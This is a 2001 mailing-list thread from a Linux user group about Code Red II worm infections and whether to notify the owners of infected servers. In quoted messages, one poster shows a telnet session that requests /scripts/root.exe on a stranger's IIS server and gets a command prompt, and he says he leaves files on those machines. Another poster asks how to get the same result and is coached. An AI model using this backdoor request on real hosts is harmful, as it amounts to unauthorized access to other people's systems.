CR worm infection attempts

Digital Wokan plug-discuss@lists.PLUG.phoenix.az.us
Thu, 09 Aug 2001 14:42:29 -0400 

The only safe way to do this, and I'll continue this analogy for S&G's
is to look up their address in the directory (assuming one searchable by
address) and give them a call.  If noone's home or they're unlisted, at
least you tried.

The real world version of what I just said:
They're running a web server, so typing the IP into a web browser to
bring up their site would be considered a normal use of their system. 
If they have a website up that hasn't been defaced yet, you can use the
contact information (which they've hopefully provided) to let them know.
Failing that, you can always try their upstream (like the chairman of
the Homeowners Association for sake of the comparison) to get in touch
with the homeowner/webmaster.  I did this for one site running a virtual
domain.  They didn't list contact info, so I contacted the www.xyz.com
webmaster who did have contact info.  That server has since been cleaned
up and is CR2 free.

George Toft wrote:
> 
> If you are walking down the street, and see a house with the door
> open, do you walk in to see if anyone is home?  When you return, and
> see the windows broken out, and the outside spray-painted, how do you
> feel?  I think this is a similar situation - if you walk in uninvited,
> it's called "illegal entry" and you may be arrested.  Likewise, testing
> a site to see if it has been exploited is illegal as you were accessing
> their computer in an unauthorized fashion.
> 
> Could you have stopped the crimes in both cases?  Maybe (if the owner
> listened to you).  Is it worth the risk to you, your reputation, and
> your family?  No.  I am not selfish - I am placing my family ahead of
> strangers, and they rely upon my income.  I suggest you do the same -
> just keep on walking, and make sure you have the safeguards of Fort
> Knox at home.
> 
> George
> 
> Derek Neighbors wrote:
> >
> > That is the problem.
> >
> > I looked at my logs out of curiosity.  I was AMAZED at the figured.  I
> > took the first IP and hit it and checked for the root.exe exploit.  Sure
> > enough it was WIDE open.
> >
> > Now I had a DILEMMA on my hands.  Do I notify this company or not?  I had
> > no malicous intent nor did I do anything.  The 'good' in me wanted to
> > notify them so that they were not 'toasted' by one will 'ill' intent.
> >
> > HOWEVER, I feared lawsuit, death and dismemberment.  So I said not a word.
> > I looked at thier website about 4 hours later and they were defaced. :(
> >
> > What kind of a world is it?  I mean if I was walking down the street with
> > my fly open, I would hope to God someone would tell me.  However, I
> > suppose even in that case you should be careful.  I mean after all,
> > noftifying someone that thier fly was open, means you were looking at
> > thier crotch.  If you were looking at their crotch you must have been
> > wanting to rape them or harass them.
> >
> > Where does the silliness stop?
> >
> > -Derek
> >
> > On Wed, 8 Aug 2001, Kim Allen wrote:
> >
> > > I've been contacting the sites that my server logs shows that have been
> > > hitting me with the code red signature and so far no one has bothered to
> > > respond except for one. However that site has told me how secure they are
> > > and how there is no way that they have any problems. When I sent them the
> > > portions of my server logs showing they do have problem they threaten
> > > legal action. Anyone else have had this type of response?
> > >
> > > > To answer your question... make sure you're hitting enter TWICE after
> > > > the command.
> > > >
> > > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > > Check it out:
> > > >
> > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > > Trying xxx.xxx.xxx.xxx...
> > > > Connected to xxx.xxx.xxx.xxx.
> > > > Escape character is '^]'.
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > HTTP/1.1 200 OK
> > > > Server: Microsoft-IIS/5.0
> > > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > > Content-Type: application/octet-stream
> > > > Microsoft Windows 2000 [Version 5.00.2195]
> > > > (C) Copyright 1985-1999 Microsoft Corp.
> > > >
> > > > c:\inetpub\scripts>
> > > >
> > > > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > > > that explains how I did it, and why they need to pay attention to
> > > > security patches. :)
> > > >
> > > > Hopefully they won't take it the 'wrong' way.
> > > >
> > > > ~g~
> > > >
> > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > > Wayne Conrad wrote:
> > > > > >
> > > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > > keep recreating the same data each time.
> > > > > >
> > > > > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > >     Wayne
> > > > > ________________________________________________
> > > > >
> > > > > I've been trying that out
> > > > >
> > > > > telnet ipaddress_from_my_httpd_access_log 80
> > > > >
> > > > > GET /scripts/root.exe HTTP/1.0
> > > > >
> > > > > but I can't get a command prompt - what am I missing?
> > > > >
> > > > > Craig
> > > > > ________________________________________________
> > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > > >
> > > > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > > >
> > > >
> > > >
> > > > ________________________________________________
> > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > >
> > > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > >
> > >
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > >
> >
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> 
> PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss